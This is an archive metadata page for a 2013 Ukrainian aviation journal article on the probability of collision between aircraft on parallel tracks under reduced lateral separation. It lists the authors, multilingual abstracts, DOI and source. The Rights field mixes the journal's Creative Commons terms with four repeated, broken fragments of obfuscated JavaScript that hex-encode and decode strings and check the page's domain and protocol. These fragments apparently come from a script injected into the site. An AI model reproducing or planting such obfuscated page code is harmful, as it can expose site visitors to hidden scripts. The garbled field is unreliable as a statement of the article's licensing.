Імовірність зіткнення повітряних кораблів на паралельних маршрутах
Наукові журнали Національного Авіаційного Університету
View Archive InfoField | Value | |
Title |
Імовірність зіткнення повітряних кораблів на паралельних маршрутах
COLLISION PROBABILITY OF AIRCRAFT FLYING ON PARALLEL TRACKS Вероятность столкновения воздушных судов на параллельных маршрутах |
|
Creator |
Kharchenko, Volodymyr; Національний авіаційний університет, проспект Космонавта Комарова, 1, Київ, Україна, 03680
Alexeiev, Oleg; Державна авіаційна служба України, проспект Перемоги, 14, Київ, Україна, 01135 Tapia, Katerina; Національний авіаційний університет, проспект Космонавта Комарова, 1, Київ, Україна, 03680 |
|
Subject |
—
безпека; бічне ешелонування; вірогідність зіткнення; повітряний корабель; помилка місцеположення 629.73:351.814.2(045) — aircraft; collision probability; lateral separation; position error; safety 629.73:351.814.2(045) — безопасность; боковое эшелонирование; вероятность столкновения; воздушное судно; ошибка местоположения 629.73:351.814.2(045) |
|
Description |
Розглянуто концепції управління повітряним рухом, зосереджені на геометрії повітряних трас. Показано, що збільшення пропускної здатності повітряного простору за рахунок більш точного витримування траєкторії та надання зменшеної помилки місцеположення, знизить рівень безпеки польотів. Проаналізовано ймовірність зіткнення двох повітряних кораблів на паралельних повітряних трасах при скороченому бічному ешелонуванні.
Concepts of Air Traffic Management are focused on the geometry of airways. Today’s navigation facilities are able to increase airspace capacity due to more accurate path keeping and providing reduced position error. It will increase capacity of airspace but decrease safety level. According to this collision probability between two aircraft flying on opposite tracks with reduced lateral separation is considered and compared with level of safety. Рассмотрены концепции управления воздушным движением, сосредоточенные на геометрии воздушных трасс. Показано, что увеличение пропускной способности воздушного пространства за счет более точного выдерживания траектории и предоставлении уменьшенной ошибки местоположения, снизит уровень безопасности полетов. Проанализирована вероятность столкновения двух воздушных судов на параллельных воздушных трассах при сокращенном боковом эшелонировании. |
|
Publisher |
National Aviation University
|
|
Contributor |
—
— — |
|
Date |
2013-04-04
|
|
Type |
—
— — |
|
Format |
application/pdf
|
|
Identifier |
http://jrnl.nau.edu.ua/index.php/visnik/article/view/3859
10.18372/2306-1472.54.3859 |
|
Source |
Proceedings of the National Aviation University; Том 54, № 1 (2013); 26-30
Вестник Национального авиационного университета; Том 54, № 1 (2013); 26-30 Вісник Національного Авіаційного Університету; Том 54, № 1 (2013); 26-30 |
|
Language |
ru
|
|
Rights |
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e |
|